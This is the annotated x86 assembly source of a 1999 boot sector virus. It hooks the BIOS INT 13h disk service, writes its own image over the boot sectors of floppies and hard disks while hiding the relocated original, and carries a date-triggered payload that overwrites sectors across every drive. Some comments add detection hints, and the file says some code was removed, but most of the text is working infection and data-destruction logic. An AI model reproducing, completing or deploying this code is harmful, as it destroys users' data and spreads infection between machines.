; boot sector virus. Thanks to those who kept this old file.
; Written in January 1999. Detected by TBAV.
; Some pieces of code are removed.
; Assembler setup: tiny model, image assembled at offset 0 so every label is
; an offset inside the sector image.
.MODEL TINY
.CODE
ORG 0000h
start: JMP init_code ; skip the reserved area that follows
; 85-byte placeholder. The INT 13h handler (v4_0) copies 55h bytes from
; offset 0203h of its read buffer to offset 0003h of this image; that is this
; area if the JMP above assembles to 3 bytes -- presumably the OS parameter
; block of the floppy being modified (confirm against the assembled image).
os_struct DB 85 DUP (?)
; Hand-encoded far JMP 07C0h:next_istruction (0EAh = JMP ptr16:16). It reloads
; CS with 07C0h so the ORG 0 offsets are valid for a sector loaded at 0000:7C00h.
init_code: DB 0EAh
DW OFFSET next_istruction
DW 07C0h
; Far pointer (offset, segment) to the original INT 13h handler; both words
; are filled in by next_istruction from the interrupt vector table.
old_int_13:
old_offset DW ?
old_segment DW ?
; Far pointer used by next_istruction to continue at load_os inside the
; relocated copy: fixed offset here, segment stored at install time.
first_mem DW OFFSET load_os
new_segment DW ?
; ------------------------------
; This section contains the new INT 13h handler
; ------------------------------
; Resident BIOS disk-service hook. Behaviour visible in this listing:
;   * Only AH=02h (read) and AH=03h (write) requests with CX=0001h and
;     DH=00h are intercepted; every other request is chained unchanged to
;     the saved original handler.
;   * For an intercepted request the addressed sector is first read into
;     CS:0200h and its marker word is compared with this copy's `signature`.
;   * Marker absent: for DL>=80h the sector just read is written to CX=0002h;
;     for DL<80h 55h bytes of it are copied into this image. This image
;     (ES:0000h) is then written to CX=0001h.
;   * DL>=80h: the caller's saved CX is incremented on the stack before
;     chaining, so the caller's request is served from sector 2.
; Analyst notes: while this handler is resident, the INT 13h vector points
; into the memory taken from the top of conventional RAM by next_istruction,
; and sector 1 as returned through BIOS is not the sector actually on disk.
; Comparing a BIOS read with a read taken from clean boot media exposes it.
new_int_13: PUSH DS
PUSH AX
CMP AH, 02h ; BIOS "read sectors"?
JZ v1
CMP AH, 03h ; BIOS "write sectors"?
JZ v1
; Pass-through path: restore the caller's AX/DS and chain to the original.
old: POP AX
POP DS
JMP DWORD PTR CS:[old_int_13]
v1: CMP CX, 0001h ; cylinder 0, sector 1 only
JZ v2
JMP old
v2: CMP DH, 00h ; head 0 only
JZ v3
JMP old
; Save the caller's registers. After these pushes the stack holds, from SP:
; DI(+00) SI(+02) ES(+04) DX(+06) CX(+08) BX(+0A), then AX and DS.
v3: PUSH BX
PUSH CX
PUSH DX
PUSH ES
PUSH SI
PUSH DI
PUSH CS
POP ES ; ES = CS: buffers live in the handler's own segment
MOV AX, 0201h ; Reads the original sector (1 sector, caller's CX/DX)
MOV BX, 0200h ; into ES:0200h, just past this 512-byte image
PUSHF ; PUSHF + far CALL emulates INT to the original handler
CALL DWORD PTR CS:[old_int_13]
; Compare the first word of our marker with the same offset in the buffer.
MOV AX, WORD PTR CS:[signature]
MOV BX, WORD PTR CS:[0200h]+OFFSET signature
CMP AX, BX
JZ v5 ; marker present: sector already carries this code
CMP DL, 80h
JB V4_0 ; DL < 80h: floppy drive numbers
; Drive 80h and above: write the sector just read to CX=0002h.
MOV AX, 0301h
MOV BX, 0200h
MOV CX, 0002h
PUSHF
CALL DWORD PTR CS:[old_int_13]
JMP v4
; Floppy: copy 55h bytes from buffer offset 0203h to image offset 0003h.
v4_0: MOV AX, CS
MOV DS, AX
MOV SI, 0200h+003h
MOV DI, 0003h
MOV CX, 0055h
REP MOVSB
; Write this image (ES:0000h, one sector) to CX=0001h of the same drive.
v4: MOV AX, 0301h
XOR BX, BX
MOV CX, 0001h
PUSHF
CALL DWORD PTR CS:[old_int_13]
v5: CMP DL, 80h
JNB v6
JMP v0
; Drive 80h and above: point ES:BX at the stack top and bump the word at
; +08, which is the caller's saved CX (0001h -> 0002h).
v6: PUSH SS
POP ES
PUSH SP
POP BX
INC WORD PTR ES:[BX]+08
; Restore the caller's registers and chain to the original handler.
v0: POP DI ; +00
POP SI ; +02
POP ES ; +04
POP DX ; +06
POP CX ; +08
POP BX ; +0A
JMP old
;--------------------------------
; This section contains the payload
; Date trigger, called from load_os. INT 1Ah AH=04h asks the BIOS for the
; real-time-clock date; DL is the day of the month in BCD. Control passes to
; `payload` only when DL == 17h, otherwise the routine returns to its caller.
check_payload: MOV AH, 04h
INT 1Ah
CMP DL, 17h ; day of month == 17 (BCD)?
JZ payload
RET
; Working variables of the payload.
current_disk DB 80h ; BIOS drive number being processed; starts at 80h
sector DB ? ; low 6 bits of CL returned by INT 13h AH=08h
max_head DB ? ; DH returned by INT 13h AH=08h
cylinder DW ? ; low byte = CH, high byte = top 2 bits of CL (AH=08h)
payload: ; Displays the name (no display code is present in this listing)
; Destructive routine, reached only through the date check in check_payload.
; It queries the geometry of `current_disk`, issues INT 13h AH=03h write
; requests with ES:BX = CS:0000h while counting down through the cylinders,
; then moves on to the next drive number. When the geometry query fails
; (carry set) control goes to `error`.
payload_destroy: MOV AH, 08h ; INT 13h function 08h: get drive parameters
MOV DL, BYTE PTR CS:[current_disk]
PUSHF ; PUSHF + far CALL emulates INT to the saved handler
CALL DWORD PTR [old_int_13]
JC error
MOV BYTE PTR CS:[max_head], DH
MOV BYTE PTR CS:[cylinder], CH
; Isolate the low 6 bits of CL (shift left 2, then right 2, on AL).
PUSH CX
MOV AX, CX
XOR AH, AH
MOV CL, 2
SHL AL, CL
SHR AL, CL
MOV BYTE PTR CS:[sector], AL
; Isolate the top 2 bits of CL as the high byte of `cylinder`.
POP CX
MOV AX, CX
XOR AH, AH
MOV CL, 6
SHR AL, CL
MOV BYTE PTR CS:[cylinder+1], AL
PUSH CS
POP ES ; ES:BX = CS:0000h is the buffer for the writes below
MOV BX, 0000h
MOV CX, WORD PTR CS:[cylinder] ; loop counter for LOOP below
; Rebuild the INT 13h CX encoding from the counter; the counter itself is
; kept on the stack.
change_cylinder: PUSH CX
XCHG CL, CH
SHL CL, 6 ; Here the instructions are altered by the
; assembler
INC CX ; Adds 1 to indicate the starting sector
over_write: MOV AH, 03h ; INT 13h function 03h: write sectors
MOV AL, BYTE PTR CS:[sector]
MOV DL, BYTE PTR CS:[current_disk]
; CX is already prepared
CMP DH, BYTE PTR CS:[max_head]
JB next_cylinder ; taken while DH is below max_head: the write is skipped
PUSHF
CALL DWORD PTR [old_int_13]
INC DH
next_cylinder: POP CX
LOOP change_cylinder
INC BYTE PTR CS:[current_disk] ; next BIOS drive number
JMP payload_destroy
; Hand-encoded far JMP F000h:FFF0h (0EAh = JMP ptr16:16), the address where
; the CPU starts executing after reset, i.e. the machine restarts.
error: DB 0EAh
DW 0FFF0h
DW 0F000h
; Boot-time installer, entered from the far JMP at init_code. Steps visible
; here: set up a stack, save the INT 13h vector, lower the BIOS base-memory
; count, point INT 13h at new_int_13 in the segment just freed, copy this
; 512-byte image there, and continue at load_os inside the copy.
; Analyst notes: the lowered word at 0000:0413h and an INT 13h vector whose
; segment sits in that reserved top-of-memory area are the resident traces.
next_istruction: XOR AX, AX
MOV DS, AX ; DS = 0000h: interrupt vector table and BIOS data
continue: CLI ; no interrupts while SS:SP is being changed
MOV SS, AX
MOV SP, 07C00h ; stack at 0000:7C00h
STI
MOV AX, WORD PTR [004Ch] ; Preserves the old INT 13h vector (entry 13h*4)
MOV WORD PTR CS:[old_offset], AX ; inside the viral code
MOV AX, WORD PTR [004Eh]
MOV WORD PTR CS:[old_segment], AX
MOV AX, WORD PTR [0413h] ; Decrements conventional memory (original comment
DEC AX ; says 2 KB; one DEC of the KB count is visible here)
MOV WORD PTR DS:[0413h], AX
MOV CL, 06h
SHL AX, CL ; KB count * 64 = segment (paragraph) address
MOV ES, AX ; This is the new address
; where the virus is loaded
MOV WORD PTR CS:[new_segment], AX ; segment half of the first_mem far pointer
MOV AX, OFFSET new_int_13 ; And installs it in the
; interrupt table
MOV WORD PTR DS:[004Ch], AX
MOV WORD PTR DS:[004Eh], ES
PUSH CS
POP DS ; DS:SI = this image, ES:DI = reserved segment
MOV CX, 0200h ; 512 bytes
XOR SI, SI
XOR DI, DI
CLD
REP MOVSB ; The virus has been transferred
JMP DWORD PTR CS:[first_mem] ; far jump to new_segment:load_os
; Runs in the relocated copy: date check, then load a boot sector to
; 0000:7C00h and jump to it. Both INT 13h calls go through the vector that
; next_istruction replaced, so the CX=0001h read below is subject to the
; redirection in new_int_13 (v6) when the sector carries the marker.
load_os: CALL check_payload ; returns here unless the date check triggers
; Loads the operating system
XOR AX, AX
MOV ES, AX
MOV BX, 7C00h ; ES:BX = 0000:7C00h, destination buffer
MOV AH, 00h ; INT 13h function 00h: reset disk system
INT 13h
MOV AH, 02h ; INT 13h function 02h: read sectors
MOV AL, 01h ; one sector
MOV CX, 0001h ; cylinder 0, sector 1
MOV DL, 80h ; first hard disk
MOV DH, 00h ; head 0
INT 13h
; Hand-encoded far JMP 0000h:7C00h (0EAh = JMP ptr16:16): run what was loaded.
DB 0EAh
DW 07C00h
DW 0000h
; Tail of the sector image.
data_error: DB 29 DUP (?) ; 29 reserved bytes; purpose not shown here, presumably padding
; Marker string. new_int_13 compares only its first word against the same
; offset of a sector it has read, to recognise a sector that already carries
; this code. For detection, the string directly precedes the 55h,0AAh bytes.
signature DB "SIGNAT"
DB 55h, 0AAh ; standard boot-sector signature bytes
END init_code